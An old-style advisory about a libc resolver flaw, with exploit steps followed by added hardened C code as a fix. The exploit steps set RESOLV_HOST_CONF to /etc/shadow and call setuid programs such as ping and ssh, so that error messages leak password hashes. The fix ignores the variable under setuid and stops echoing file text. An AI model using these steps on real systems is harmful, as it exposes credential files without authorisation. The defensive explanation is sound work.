This should be exploitable on systems with libc < 5.4.7.

To exploit, run the bash shell and do:

    export RESOLV_HOST_CONF=

where the value you assign is the file you want to read (/etc/shadow is a good start). Then try each of the following:

    ping asdf
    traceroute asdf
    rlogin asdf
    ssh asdf

See if they work. If so, bingo. If not, try a couple of other setuid programs that need to look up hostnames. This will output something like:

    resolv+: "blahblahblahblahblah" is an invalid keyword

What's in the quotes is the first word of each line of the file. The "first word" is the whole line up until a space is read... which for /etc/shadow includes the encrypted password.
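Two defects combine here: a setuid program honours an attacker-controlled environment variable to pick its config file, and the resolver's error message echoes the file's contents. The following is an added illustration of the hardened pattern for both, written for this page and not libc's own code; the default path, the keyword list and the function names are assumptions.

```c
/* Hardened config-path selection and a parser whose diagnostics do not
 * echo file contents. Illustrative code, not libc's; the default path
 * and keyword list are assumptions. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define DEFAULT_HOST_CONF "/etc/host.conf"   /* assumed default location */

/* Honour the RESOLV_HOST_CONF override only when real and effective
 * ids match, i.e. the process is not running setuid/setgid. A caller
 * with fewer privileges than the program therefore cannot redirect it
 * to a file the caller could not read. */
const char *host_conf_path(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                           const char *env_value)
{
    int privileged = (ruid != euid) || (rgid != egid);
    if (privileged || env_value == NULL || env_value[0] == '\0')
        return DEFAULT_HOST_CONF;
    return env_value;
}

/* Validate one host.conf line. Returns 1 if the first word is a known
 * keyword (or the line is blank/comment), 0 otherwise. The diagnostic
 * names only the line number, never the offending text, so even a
 * misdirected config file cannot be read back through error output. */
int check_host_conf_line(const char *line, int lineno, FILE *diag)
{
    static const char *const keywords[] = {
        "order", "trim", "multi", "nospoof", "spoofalert", "reorder"
    };
    char word[64];
    size_t n = strcspn(line, " \t\n");      /* first word ends at whitespace */
    if (n == 0 || line[0] == '#')
        return 1;
    if (n >= sizeof word)
        n = sizeof word - 1;
    memcpy(word, line, n);
    word[n] = '\0';
    for (size_t i = 0; i < sizeof keywords / sizeof keywords[0]; i++)
        if (strcmp(word, keywords[i]) == 0)
            return 1;
    if (diag)
        fprintf(diag, "resolv+: invalid keyword on line %d\n", lineno);
    return 0;
}
```

In a real program the wrapper would call host_conf_path with getuid()/geteuid()/getgid()/getegid() and getenv("RESOLV_HOST_CONF"); the pure function is split out so the privilege check can be tested without a setuid binary.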